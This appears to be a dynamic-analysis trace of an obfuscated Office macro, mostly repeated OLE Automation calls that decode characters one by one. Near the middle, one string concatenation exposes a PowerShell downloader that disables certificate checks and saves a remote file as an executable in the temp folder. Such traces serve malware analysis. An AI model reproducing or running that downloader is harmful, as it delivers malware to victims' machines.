[0047.377] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.377] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.378] GetUserDefaultLCID () returned 0x409 [0047.378] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.378] GetUserDefaultLCID () returned 0x409 [0047.378] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.378] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.379] GetUserDefaultLCID () returned 0x409 [0047.379] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.379] GetUserDefaultLCID () returned 0x409 [0047.379] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.379] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.380] GetUserDefaultLCID () returned 0x409 [0047.380] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.380] GetUserDefaultLCID () returned 0x409 [0047.380] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.380] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.381] GetUserDefaultLCID () returned 0x409 [0047.381] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.381] GetUserDefaultLCID () returned 0x409 [0047.381] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.381] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.382] GetUserDefaultLCID () returned 0x409 [0047.382] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.383] GetUserDefaultLCID () returned 0x409 [0047.383] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.383] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.384] GetUserDefaultLCID () returned 0x409 [0047.384] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.384] GetUserDefaultLCID () returned 0x409 [0047.384] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.384] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.385] GetUserDefaultLCID () returned 0x409 [0047.385] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.385] GetUserDefaultLCID () returned 0x409 [0047.385] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.385] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.386] GetUserDefaultLCID () returned 0x409 [0047.386] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.386] GetUserDefaultLCID () returned 0x409 [0047.386] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.386] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.388] GetUserDefaultLCID () returned 0x409 [0047.388] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.388] GetUserDefaultLCID () returned 0x409 [0047.388] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.388] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.389] GetUserDefaultLCID () returned 0x409 [0047.389] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.389] GetUserDefaultLCID () returned 0x409 [0047.389] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.389] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.390] GetUserDefaultLCID () returned 0x409 [0047.390] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.390] GetUserDefaultLCID () returned 0x409 [0047.390] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.391] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.392] GetUserDefaultLCID () returned 0x409 [0047.392] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.392] GetUserDefaultLCID () returned 0x409 [0047.392] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.392] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.393] GetUserDefaultLCID () returned 0x409 [0047.393] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.393] GetUserDefaultLCID () returned 0x409 [0047.393] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.393] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.394] GetUserDefaultLCID () returned 0x409 [0047.394] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.394] GetUserDefaultLCID () returned 0x409 [0047.395] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.395] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.396] GetUserDefaultLCID () returned 0x409 [0047.396] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.396] GetUserDefaultLCID () returned 0x409 [0047.396] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.396] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.397] GetUserDefaultLCID () returned 0x409 [0047.397] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.397] GetUserDefaultLCID () returned 0x409 [0047.397] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.397] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.398] GetUserDefaultLCID () returned 0x409 [0047.398] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.398] GetUserDefaultLCID () returned 0x409 [0047.398] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.398] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.399] GetUserDefaultLCID () returned 0x409 [0047.400] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.400] GetUserDefaultLCID () returned 0x409 [0047.400] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.400] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.401] GetUserDefaultLCID () returned 0x409 [0047.401] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.401] GetUserDefaultLCID () returned 0x409 [0047.401] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.401] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.402] GetUserDefaultLCID () returned 0x409 [0047.402] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.403] GetUserDefaultLCID () returned 0x409 [0047.403] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.403] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.404] GetUserDefaultLCID () returned 0x409 [0047.404] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.404] GetUserDefaultLCID () returned 0x409 [0047.404] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.404] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.405] GetUserDefaultLCID () returned 0x409 [0047.405] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.406] GetUserDefaultLCID () returned 0x409 [0047.406] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.406] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.407] GetUserDefaultLCID () returned 0x409 [0047.407] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.407] GetUserDefaultLCID () returned 0x409 [0047.407] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.407] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.408] GetUserDefaultLCID () returned 0x409 [0047.408] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.408] GetUserDefaultLCID () returned 0x409 [0047.408] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.408] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.409] GetUserDefaultLCID () returned 0x409 [0047.409] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.409] GetUserDefaultLCID () returned 0x409 [0047.409] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.410] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.411] GetUserDefaultLCID () returned 0x409 [0047.411] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.411] GetUserDefaultLCID () returned 0x409 [0047.411] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.411] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.412] GetUserDefaultLCID () returned 0x409 [0047.412] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.412] GetUserDefaultLCID () returned 0x409 [0047.412] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.412] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.413] GetUserDefaultLCID () returned 0x409 [0047.413] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.413] GetUserDefaultLCID () returned 0x409 [0047.413] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.413] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.414] GetUserDefaultLCID () returned 0x409 [0047.414] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.415] GetUserDefaultLCID () returned 0x409 [0047.415] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.415] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.415] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($strin", bstrRight="g1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.417] GetUserDefaultLCID () returned 0x409 [0047.417] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01ފ") returned 0x0 [0047.417] GetUserDefaultLCID () returned 0x409 [0047.417] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.417] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.418] GetUserDefaultLCID () returned 0x409 [0047.418] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.418] GetUserDefaultLCID () returned 0x409 [0047.418] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.418] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.419] GetUserDefaultLCID () returned 0x409 [0047.419] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.420] GetUserDefaultLCID () returned 0x409 [0047.420] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.420] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.421] GetUserDefaultLCID () returned 0x409 [0047.421] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.421] GetUserDefaultLCID () returned 0x409 [0047.421] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.421] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.422] GetUserDefaultLCID () returned 0x409 [0047.422] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.422] GetUserDefaultLCID () returned 0x409 [0047.422] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.422] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.423] GetUserDefaultLCID () returned 0x409 [0047.423] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.423] GetUserDefaultLCID () returned 0x409 [0047.423] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.423] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.424] GetUserDefaultLCID () returned 0x409 [0047.425] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.425] GetUserDefaultLCID () returned 0x409 [0047.425] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.425] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.426] GetUserDefaultLCID () returned 0x409 [0047.426] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.426] GetUserDefaultLCID () returned 0x409 [0047.426] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.426] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.427] GetUserDefaultLCID () returned 0x409 [0047.427] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.427] GetUserDefaultLCID () returned 0x409 [0047.427] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.427] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.428] GetUserDefaultLCID () returned 0x409 [0047.428] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.428] GetUserDefaultLCID () returned 0x409 [0047.429] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.429] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.430] GetUserDefaultLCID () returned 0x409 [0047.430] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.430] GetUserDefaultLCID () returned 0x409 [0047.430] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.430] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.431] GetUserDefaultLCID () returned 0x409 [0047.431] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.431] GetUserDefaultLCID () returned 0x409 [0047.431] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.431] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.432] GetUserDefaultLCID () returned 0x409 [0047.432] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.432] GetUserDefaultLCID () returned 0x409 [0047.432] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.432] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.433] GetUserDefaultLCID () returned 0x409 [0047.433] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.433] GetUserDefaultLCID () returned 0x409 [0047.433] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.433] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.434] GetUserDefaultLCID () returned 0x409 [0047.434] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.435] GetUserDefaultLCID () returned 0x409 [0047.435] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.435] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.436] GetUserDefaultLCID () returned 0x409 [0047.436] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.437] GetUserDefaultLCID () returned 0x409 [0047.437] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.437] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.438] GetUserDefaultLCID () returned 0x409 [0047.438] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.438] GetUserDefaultLCID () returned 0x409 [0047.438] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.438] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.439] GetUserDefaultLCID () returned 0x409 [0047.439] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.439] GetUserDefaultLCID () returned 0x409 [0047.439] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.439] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.440] GetUserDefaultLCID () returned 0x409 [0047.440] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.440] GetUserDefaultLCID () returned 0x409 [0047.440] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.440] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.441] GetUserDefaultLCID () returned 0x409 [0047.442] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.442] GetUserDefaultLCID () returned 0x409 [0047.442] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.442] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.443] GetUserDefaultLCID () returned 0x409 [0047.443] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.443] GetUserDefaultLCID () returned 0x409 [0047.443] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.443] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.444] GetUserDefaultLCID () returned 0x409 [0047.444] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.444] GetUserDefaultLCID () returned 0x409 [0047.444] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.444] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.445] GetUserDefaultLCID () returned 0x409 [0047.445] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.446] GetUserDefaultLCID () returned 0x409 [0047.446] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.446] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.447] GetUserDefaultLCID () returned 0x409 [0047.447] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.447] GetUserDefaultLCID () returned 0x409 [0047.447] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.447] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.448] GetUserDefaultLCID () returned 0x409 [0047.448] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.448] GetUserDefaultLCID () returned 0x409 [0047.448] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.448] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.449] GetUserDefaultLCID () returned 0x409 [0047.450] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.450] GetUserDefaultLCID () returned 0x409 [0047.450] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.450] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.451] GetUserDefaultLCID () 